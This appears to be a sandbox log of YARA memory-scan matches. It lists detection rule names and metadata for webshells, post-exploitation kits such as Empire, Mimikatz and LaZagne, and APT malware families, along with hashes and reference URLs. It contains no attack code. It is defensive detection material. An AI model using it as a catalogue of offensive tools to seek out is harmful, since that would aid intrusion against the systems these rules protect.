Source: 00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshell_27_9_acid_c99_locus7s date = 2016-01-11, hash5 = bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96, hash4 = 07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a, hash3 = 960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668, hash2 = 7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549, author = Florian Roth, description = Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, hash8 = ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f, hash7 = ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f, hash6 = 5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3, reference = https://github.com/nikicat/web-malware-collection, score = 2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4
Source: 00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 00000013.00000003.470647242.0000000006B9B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_PHP_b37 date = 2014/01/28, author = Florian Roth, description = Web Shell - file b37.php, score = 0421445303cfd0ec6bc20b3846e30ff0
Source: 00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_PHP_b37 date = 2014/01/28, author = Florian Roth, description = Web Shell - file b37.php, score = 0421445303cfd0ec6bc20b3846e30ff0
Source: 00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, hash = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000002.552309239.00000000036C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat date = 2014/01/28, hash4 = 3f71175985848ee46cc13282fbed2269, hash3 = 4108f28a9792b50d95f95b9e5314fa1e, hash2 = 1d912c55b96e2efe8ca873d6040e3b30, hash1 = 513b7be8bd0595c377283a7c87b44b2e, author = Florian Roth, description = Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, score = ae025c886fbe7f9ed159f49593674832
Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire_Invoke_Shellcode date = 2015-08-06, author = Florian Roth, description = Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, reference = https://github.com/PowerShellEmpire/Empire, license = https://creativecommons.org/licenses/by-nc/4.0/, score = fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438
Source: 0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, hash = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_jsp_cmdjsp date = 2014/01/28, author = Florian Roth, description = Web Shell - file cmdjsp.jsp, score = b815611cc39f17f05a73444d699341d4
Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_sig_404super date = 2014/03/28, author = Florian Roth, description = Web shells - generated from file 404super.php, score = 7ed63176226f83d36dce47ce82507b28
Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_webshells_new_Asp date = 2014/03/28, author = Florian Roth, description = Web shells - generated from file Asp.asp, score = 32c87744ea404d0ea0debd55915010b7
Source: 00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: multiple_webshells_0015 hash3 = 38fd7e45f9c11a37463c3ded1c76af4c, hash2 = 09609851caa129e40b0d56e90dfc476c, hash1 = 44542e5c3e9790815c49d5f9beffbbf2, hash0 = 9c5bb5e3a46ec28039e8986324e42792, author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, super_rule = _wacking_php_php_1_SpecialShell_99_php_php_c100_php
Source: 00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshell_27_9_acid_c99_locus7s date = 2016-01-11, hash5 = bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96, hash4 = 07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a, hash3 = 960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668, hash2 = 7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549, author = Florian Roth, description = Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, hash8 = ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f, hash7 = ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f, hash6 = 5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3, reference = https://github.com/nikicat/web-malware-collection, score = 2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4
Source: 00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SQLMap date = 01.07.2014, author = Florian Roth, description = This signature detects the SQLMap SQL injection tool, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PortRacer author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file PortRacer.exe, hash = 2834a872a0a8da5b1be5db65dfdef388
Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Fierce2 date = 01.07.2014, author = Florian Roth, description = This signature detects the Fierce2 domain scanner, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx description = Web Shell - from files Shell [ci
Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Volgmer_Malware date = 2017-11-15, hash5 = 6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1, hash4 = e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11, hash3 = eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5, hash2 = 8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b, hash1 = ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd, author = Florian Roth, description = Detects Volgmer malware as reported in US CERT TA17-318B, hash8 = 1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d, hash7 = 53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d, hash6 = fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9, reference = https://www.us-cert.gov/ncas/alerts/TA17-318B, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ProcessInjector_Gen date = 2018-04-23, author = Florian Roth, description = Detects a process injection utility that can be used ofr good and bad purposes, reference = https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazagne_PW_Dumper date = 2018-03-22, author = Markus Neis / Florian Roth, description = Detects Lazagne PW Dumper, reference = https://github.com/AlessandroZ/LaZagne/releases/, score =
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_shellpop_Bash date = 2018-05-18, hash1 = 36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b, author = Tobias Michalski, description = Detects susupicious bash command, reference = https://github.com/0x00-0x00/ShellPop
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_dropper_script_Dec17_1 date = 2018-01-01, author = Florian Roth, description = Detects a supicious VBS script that drops an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazarus_Dec_17_5 date = 2017-12-20, hash1 = db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471, author = Florian Roth, description = Detects Lazarus malware from incident in Dec 2017, reference = https://goo.gl/8U6fY2, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Turla_Agent_BTZ_Gen_1 date = 2018-06-16, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = Internal Research, score = c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Turla_Mal_Script_Jan18_1 date = 2018-01-19, hash1 = 180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc, author = Florian Roth, description = Detects Turla malicious script, reference = https://ghostbin.com/paste/jsph7, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_Obfuscated_Mal_Feb18_1 date = 2018-02-12, hash3 = e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74, hash2 = c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036, hash1 = 06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab, author = Florian Roth, description = Detects malicious obfuscated VBS observed in February 2018, reference = https://goo.gl/zPsn83, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_ScanCopyPDF_Feb18 date = 2018-02-14, hash1 = 6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be, author = Florian Roth, description = Auto-generated rule - file Scan Copy.pdf.com, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Armitage_msfconsole date = 2017-12-24, hash1 = 662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a, author = Florian Roth, description = Detects Armitage component, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Armitage_OSX date = 2017-12-24, hash2 = b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3, hash1 = 2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af, author = Florian Roth, description = Detects Armitage component, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Silence_malware_2 date = 2017-11-01, hash1 = 75b8f534b2f56f183465ba2b63cfc80b7d7d1d155697af141447ec7144c2ba27, author = Florian Roth, description = Detects malware sample mentioned in the Silence report on Securelist, reference = https://securelist.com/the-silence/83009/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_PSImage date = 2017-12-16, author = Florian Roth, description = Detects a command to execute PowerShell from String, reference = https://github.com/peewpw/Invoke-PSImage, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_apt15_royaldll sha256 = bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d, author = David Cannings, description = DLL implant, originally rights.dll and runs as a service
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.312268650.0000000006667000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire_Invoke_Shellcode date = 2015-08-06, author = Florian Roth, description = Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, reference = https://github.com/PowerShellEmpire/Empire, license = https://creativecommons.org/licenses/by-nc/4.0/, score = fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438
Source: 0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, hash = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: multiple_webshells_0015 hash3 = 38fd7e45f9c11a37463c3ded1c76af4c, hash2 = 09609851caa129e40b0d56e90dfc476c, hash1 = 44542e5c3e9790815c49d5f9beffbbf2, hash0 = 9c5bb5e3a46ec28039e8986324e42792, author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, super_rule = _wacking_php_php_1_SpecialShell_99_php_php_c100_php
Source: 00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshell_27_9_acid_c99_locus7s date = 2016-01-11, hash5 = bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96, hash4 = 07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a, hash3 = 960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668, hash2 = 7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549, author = Florian Roth, description = Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, hash8 = ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f, hash7 = ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f, hash6 = 5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3, reference = https://github.com/nikicat/web-malware-collection, score = 2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4
Source: 00000013.00000003.481501193.0000000006DCE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.324781029.00000000068E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.473662008.0000000006B9B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_PHP_b37 date = 2014/01/28, author = Florian Roth, description = Web Shell - file b37.php, score = 0421445303cfd0ec6bc20b3846e30ff0
Source: 00000013.00000003.481442342.0000000006D9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: shankar_php_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file shankar.php.php.txt, hash = 6eb9db6a3974e511b7951b8f7e7136bb
Source: 0000000A.00000003.325135478.0000000006854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: shankar_php_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file shankar.php.php.txt, hash = 6eb9db6a3974e511b7951b8f7e7136bb
Source: 00000013.00000003.463235186.0000000006E38000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SQLMap date = 01.07.2014, author = Florian Roth, description = This signature detects the SQLMap SQL injection tool, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.470663077.0000000006BA5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.324504797.0000000006892000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.325168966.0000000006892000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Fierce2 date = 01.07.2014, author = Florian Roth, description = This signature detects the Fierce2 domain scanner, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx description = Web Shell - from files Shell [ci
Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 0000000A.00000003.312103557.0000000006629000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 00000013.00000002.541755283.0000000002FA0000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_h6ss date = 2014/01/28, author = Florian Roth, description = Web Shell - file h6ss.php, score = 272dde9a4a7265d6c139287560328cd5
Source: 00000013.00000003.477128932.00000000052EB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Volgmer_Malware date = 2017-11-15, hash5 = 6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1, hash4 = e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11, hash3 = eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5, hash2 = 8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b, hash1 = ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd, author = Florian Roth, description = Detects Volgmer malware as reported in US CERT TA17-318B, hash8 = 1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d, hash7 = 53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d, hash6 = fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9, reference = https://www.us-cert.gov/ncas/alerts/TA17-318B, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ProcessInjector_Gen date = 2018-04-23, author = Florian Roth, description = Detects a process injection utility that can be used ofr good and bad purposes, reference = https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazagne_PW_Dumper date = 2018-03-22, author = Markus Neis / Florian Roth, description = Detects Lazagne PW Dumper, reference = https://github.com/AlessandroZ/LaZagne/releases/, score =
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_shellpop_Bash date = 2018-05-18, hash1 = 36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b, author = Tobias Michalski, description = Detects susupicious bash command, reference = https://github.com/0x00-0x00/ShellPop
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_dropper_script_Dec17_1 date = 2018-01-01, author = Florian Roth, description = Detects a supicious VBS script that drops an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lazarus_Dec_17_5 date = 2017-12-20, hash1 = db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471, author = Florian Roth, description = Detects Lazarus malware from incident in Dec 2017, reference = https://goo.gl/8U6fY2, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Turla_Agent_BTZ_Gen_1 date = 2018-06-16, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = Internal Research, score = c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Turla_Mal_Script_Jan18_1 date = 2018-01-19, hash1 = 180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc, author = Florian Roth, description = Detects Turla malicious script, reference = https://ghostbin.com/paste/jsph7, license = https://creativecommons.org/licenses/by-nc/4.0/
